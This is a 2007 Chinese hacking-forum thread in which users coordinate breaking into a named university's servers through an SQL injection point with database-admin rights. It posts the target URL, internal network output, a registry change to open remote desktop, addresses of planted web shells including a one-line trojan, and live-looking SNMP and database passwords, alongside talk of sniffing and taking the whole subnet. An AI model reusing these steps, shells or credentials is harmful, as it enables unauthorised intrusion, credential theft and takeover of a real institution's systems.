[讨论]一个SA注入点,弄了好久都拿不到shell
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注入点:[url]http://www.zzuli.edu.cn/hy/cnt/message.asp?user=zzulihy[/url]
SA权限,支持显错模式
由于是数据库和网站分离不能用getwebshell,于是跨库猜密码,但没有找到可以利用的拿shell的页面
谁能帮个忙,弄了好久了。拿到shell了短消息M下我,谢谢 本地反向连接他数据库试试`? [s:266] ~`这个猪入点可正常执行系统指令啊~`不是很好日么?先把DB服务器日了,再日WEB咯~ [url]http://zhaosheng.zzuli.edu.cn/[/url] 试下这个 我想这个应该弱点
改个能不能下手哦 ...
芒果应该搞过了吧? 这个应该是比较容易拿到服务器的。 很不错的肉鸡群。
"用户组权限:你所属的用户组没有发送短消息权限 "
我暂时还没有权限发送短消息, 如果有问题可以站内联系我。
Windows IP Configuration
Host Name . . . . . . . . . . . . : ncserviceu407
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : Yes
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 3:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
Physical Address. . . . . . . . . : 00-14-22-19-C2-D5
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 218.198.127.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 218.198.127.1
DNS Servers . . . . . . . . . . . : 202.196.0.1
Interface: 218.198.127.2 --- 0x10003
Internet Address Physical Address Type
218.198.127.1 00-00-cd-14-60-78 dynamic
218.198.127.7 00-0d-56-bb-64-06 dynamic
218.198.127.18 00-30-48-10-92-4e dynamic
218.198.127.25 00-30-48-5a-31-e0 dynamic
218.198.127.79 00-0d-56-bb-64-4d dynamic 那db虽然配置了网关,却不能上网。ping [url]www.163.com[/url] 返回信息。。。;外面扫,端口一个都没有
或者是用策略封死了。
日DB:用策略的就改策略;网关不行的给他换
---------------------------------------------------------------------
这个是学校的,日的范围大着了。国内的不占手 补充一下: 就是一个tcp/ip筛选限制 的问题, 把 EnableSecurityFilters"=dWord:00000001,改成EnableSecurityFilters"=dword:00000000 就可以3389直接登陆了。
由于是国内的主机, 就放过了。
c:\a.reg
c:\b.reg
c:\c.reg
是我导出的, 如果想那主机的兄弟, 自己直接改了上传导入, 重启, 就可以, 登陆拿下主机了。 接下来, 嗅探什么的大家自己发挥拉。。。 感谢大家啊,不过这里申明下,这个注入不是我去弄的,我是代朋友发的,我现在发端消息我那朋友的QQ给回复过的4FUN吧 [quote]引用第6楼4fun于2007-10-12 17:35发表的 :
补充一下: 就是一个tcp/ip筛选限制 的问题, 把 EnableSecurityFilters"=dWord:00000001,改成EnableSecurityFilters"=dword:00000000 就可以3389直接登陆了。
由于是国内的主机, 就放过了。
c:a.reg
.......[/quote]
看了下
没猜错的话 此服务器还没被人拿下.....
type a.reg
已经是
EnableSecurityFilters"=dword:00000000
查看了下自己的
EnableSecurityFilters"=dword:00000001
不知是不是4fun搞颠倒了.....
请教下4fun兄
从注册表中的哪一项看出的这是个"tcp/ip筛选限制"的原因 ?
谢谢 EnableSecurityFilters"=dword:00000000 是我改后导入注册表的 不是端口过滤,是路由器设置的!
给你几个SHELL
[url]http://bwc.zzuli.edu.cn/ttl.asp[/url]
[url]http://wlzx.zzuli.edu.cn/hack.aspx[/url](一句话马)
几个密码:
snmpv2 zzulivhost
218.198.127.2;Database=wlzx_web;Uid=sa;pwd=^%$#@!654321
我装了下CAIN,把他SP2卸了。下次可以直接findpass的。
把3389变80端口,登陆进去,端口过滤就没拉,有耐心的话,整个网段也可以拿的 有了SA后有的也是不方便执行命令的,但是至少备份可以用,想办法通过备份直接获取系统权限吧 fatcat 是怎么拿到SHELL的啊 想不到注册表还是这么有用啊,以后好好研究一下 [quote]引用第10楼fatcat于2007-10-17 00:59发表的 :
不是端口过滤,是路由器设置的!
给你几个SHELL
[url]http://bwc.zzuli.edu.cn/ttl.asp[/url]
[url]http://wlzx.zzuli.edu.cn/hack.aspx[/url](一句话马)
几个密码:
.......[/quote]
你是怎么拿到shell的?
希望留下QQ或EMAIL联系下
先谢了 [quote]引用第8楼sliverg于2007-10-15 19:47发表的 :
看了下
没猜错的话 此服务器还没被人拿下.....
type a.reg
已经是
.......[/quote]
你用什么工具type的
我怎么用啊D type不出来
还有他们那些
a.reg
a.txt
....是怎么上传上去的(是不是数据库和web分离的站,列出来的目录是数据库服的目录,如果用啊D那工具上传也是保存在数据库服.问题就出在这了,我用啊D提示成功,可是从新列还是没有我的那文件. 所以想知道他是怎么上传上去那几个文件的) [quote]引用第15楼尚振1989于2007-10-23 22:56发表的 :
你用什么工具type的
我怎么用啊D type不出来
.......[/quote]
学习一下dos命令 就ok了 :)
页:
[1]